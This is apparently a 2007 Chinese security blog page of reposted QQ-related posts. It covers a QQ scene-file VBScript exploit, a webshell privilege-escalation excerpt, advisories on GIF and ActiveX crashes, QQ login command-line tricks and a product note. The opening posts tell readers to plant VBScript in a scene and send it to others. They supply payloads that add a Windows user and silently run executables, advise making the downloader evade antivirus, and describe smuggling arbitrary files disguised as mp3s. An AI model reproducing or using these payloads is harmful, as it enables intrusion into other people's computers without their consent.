update(2007.8.14 22:00):在雕牌那里看到了点相关资料,更新下。补充在下面。
鬼仔注:我这里测试有的成功,有的不成功,原因不明。同样的版本的情况下,有的成功,有的失败。比如同样的beta1,有的失败,有的成功,beta4也有的失败,有的成功。当然,VBScript.qqs中的脚本可以自己修改,达到别的目的。利用场景。懒得贴图了,自己测试吧。
来源:Crab's Blog
把那3个文件解到\Tencent\QQ\IMScene\Scene\
用记事本打开VBScript.qqs
最下边 有那个代码了
然后在场景中发给别人
下载:qq.rar
相关资料(来源:雕牌's blog)
关于那QQ 0day 一点资料,现在把具体过程写出来,大家看看吧,也许有人能突破。我在blog上早就说明了,我不装B,这个QQ的测试,我从没拿外面的人测试,你们说,我算是装B么。再说了,我blog写这个的时候就说过,还在测试中,从没说已经成功利用,一直卡在执行文件那一步。
测试过程:
一开始和教主测试的时候是因为ms的播放器能够播放swf文件。这个我在上个月就写过文章了,当初是测试QQ场景的播放器,但是发现无法触发这个漏洞,因为这个播放器不是使用的MS播放的。所以后来教主貌似去测试别的东西了,我呢,继续测这个QQ,前几天测试的时候做了几个包,有弹框框的包,有传exe的包,有使对放QQ崩溃的包。这个QQ的漏洞想必大家应该都清楚了。我还是简单说说。
问题文件确实是在QQ场景里面,场景里面有一个图片文件和VBScript.qqs,Config.qqs,文件。每个文件的具体作用简单说说,那个图片文件不用说了,就是场景的背景。Config.qqs文件的内容是:
<?xml version="1.0" encoding="gb2312"?><theme ver="1" GUID="8B7A99E866CC454DBE2A7F6238EE8F20">
<Scene Type="1" BackGroupColor="#FFFFFF" FriendCaptionColor="#0000FF" MineCaptionColor="#000000" MsgTextColor="#000000" SystemRequestColor="#000000" SystemResultColor="#000000">
<Normal>
<SOUND Loop="true" SourcePath="E000001.mp3"/>
</Normal>
<Action name="动作01" type="1">
<ActionData>
<SOUND UseNormalSound="false" Loop="true" SourcePath="E000001.mp3"/>
</ActionData>
</Action>
</Scene>
</theme>
一目了然。VBScript.qqs这个文件的作用是一段些'动画参数,初始化帧动画参数,初始化背景图片位置,场景窗口大小改变的时候重新布置场景等等事件的脚本。看文件名字就知道是VBS脚本。
但是这个VBS脚本不是用winds下的vbs.dll解析的,而是用的QQ自己目录下的一个vbs*.dll文件解析的。VBS能做什么,大家比我再清楚不过了,VBS下载者,执行,病毒。功能强大。加用户什么的都是轻而易举。这里给几个VBS脚本出来,大家如果对这个漏洞还有兴趣,可以自己去测试测试,
add user:
dim objshell
set objshell = wscript.createOBject("wscript.shell")
iReturn = objshell.Run("net user x x /add",0,TRUE)
run dos exe:
dim ws
Set ws = WScript.CreateObject("WScript.Shell")
iReturn = ws.Run("test.exe",0,TRUE)
run gui exe:
dim wsh
dim Js1
Js1 ="t1est.exe"
set wsh=WScript.CreateObject("WScript.Shell")
wsh.Run(Js1)
还有如果用VBS下载着记得免杀,因为测试的时候被杀,所以后来才去研究传任意文件。那么如何传任意文件,下面介绍的这个方法在我们测试期间都成功过,但是今天测试的时候貌似不成功。方法写出来。
这个方法也是在研究swf的时候发现的,因为制作场景不支持添加swf文件。后来就想办法。先制作QQ安装包,里面添加音乐。那音乐就是swf改后缀的文件。添加后再生成包。再用UE或者别的16进制编辑的。查找里面mp3后缀,改掉就成了。这个地方也许还有研究,就是他生成的文件为什么一定在QQ的 IMScene\Scene\这个目录呢,如果在这里就能改变他的路径,直接写到启动里面不就OK了,关于这个我没测试成功,还等待各位牛人发现。再次申明这个传任意文件的这个漏洞貌似TX已经封了,不是很清楚,也许今天测试掉了步骤。关于这个漏洞大家有什么看法,或者新的想法,可以跟帖,欢迎一起测试。
Tags: QQ
来源:绝对零度 blog
以下启动QQ调用
QQ.exe /START QQUIN:[QQ号] [算出的密码] /STAT:[是否隐身]
隐身/不隐身: 40/41
例:D:\Program Files\Tencent\QQ\QQ.exe /START QQUIN:12345678 PWDHASH:JdVa0oOqQAr0ZMdtcTwHrQ== /STAT:41
以下密码算法调用
[/code]
Public Function Str2QQPwdHash(Str1 As String)
Str2QQPwdHash = Hex2Base64(MD5(Str1, 32)) & "=="
End Function
以下模块代码
Private m_lOnBits(30)
阅读全文 »
Tags: QQ
鬼仔注:怕TX追究责任?也许不是这个想法。
但是这样叫做开源吗?要想获得代码,还有三个条件。何谓开源?
信息来源:cnBeta
种种原因,飘云决定小范围开源。
由于这次开放的代码对加入者要求难度比较高。
本次开源只是为了更好的研究技术,因此要获得完整的代码,要分为三个步骤的。
想获得代码者要确信自己懂的如何写钩子程序、看得懂汇编,有耐心分析协议。
如果你认为你可以做到这么三点,那么你可以PM给我。
我会先给一个钩子的程序给您,然后您可以自行写几个Demo
下面的步骤是给汇编的代码。并简单的提示。
第三步是讲解是如何分析协议的过程。
飘云社区公告地址:http://bbs.pyqq.cn/notice.php?fid=-1#91
Tags: QQ
服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯QQ又被列入了这些捷径名单,好在QQ并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。
一、在Windows2003中得到的Webshell
此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003,但OA仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。
登陆webshell后发现只能查看服务器的D盘,对C盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为 wenshell只有guests组权限,再加上win20 阅读全文 »
Tags: QQ
鬼仔注:以前听说过QQ会被监控的事情,不过没怎么在意。
今天看到有人专门写了这个小文,而且还提供了证明的方法。
按照文中所说的方法,我netstat -an看了下我机子的网络连接状态(图在下面),有跟文中一样的现象。
为了证明文中所说的,我专门在宿舍其他人的机器上登录另外一个QQ,然后查看网络连接,并没有发现219.133.60.243:8000,但是我机子登录我的QQ,再查看网络连接,就会看到219.133.60.243:8000
难道说我的QQ被监控?我可是菜鸟一只,也会被监控?BS!
不过还未确定此事的真实性。
信息来源:ODAY的BLOG
阅读全文 »
Tags: QQ
by axis(axis_at_ph4nt0m.org) & luoluo_at_ph4nt0m & yunshu_at_ph4nt0m
http://www.ph4nt0m.org
发现时间:2007.1.25 报告时间:2007.1.26。
摘要:
QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。在解析畸形GIF图形组件时存在缓冲区溢出漏洞,攻击者可能利用此漏洞在用户机器使QQ崩溃造成拒绝服务。
影响版本:
QQ2007beta1以前的QQ版本。
不受影响版本:
QQ2007beta1。
细节:
QQ在解析GIF图形时使用的是Riched20.dll,在解析GIF格式时,对其读入的Image Block宽度未做边界检查,当设置为0时,会分配比指定大小要小 阅读全文 »
Tags: QQ,
漏洞
by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org
Date: 2007-02-13
摘要:
QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。幻影旅团的axis发现了一个QQZone的activex漏洞。在使用WebCtrl
方法时,将引用一个空指针,造成ie崩溃。由于该activex没有标记为safe,故会出现安全提示。
影响版本:
Tencent QQ2006/2007及之前所有版本。
by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org
Date: 2007-02-13
摘要:
QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛 阅读全文 »
Tags: Activex,
QQ,
QQ空间
QQTalk是一款支持多人语音交流的团队语音通信工具,主要面向需团队协作的游戏用户,也适用于需多人语音沟通的办公和家庭用户。
该软件小巧、灵活、上手简单,性能卓越,能以极小的带宽占用,穿越防火墙,提供清晰高质的语音服务。欢迎到QQTalk讨论专区对我们产品提出任何意见。
一款类似 UT 的软件,看来腾某的野心不小,每个方面都想插一脚,而且是看到人家成功之后就推出类似的软件,不过腾某依托其强大的用户群,推出的东西发展起来也比较快。。
我们宿舍有几个玩魔兽世界的,他们平时下副本什么的都用 UT ,也就是 UTalk ,现在已经改名叫 UC Talk 了。同样的软件好像还有 TS ,不过我没用过。刚下了一个看看,贴个界面图:
相关链接:
QQ Talk 试用计划
QQTalk讨论专区
下载地址: http://exp.qq.com/files/55_1170667139.exe
Tags: QQ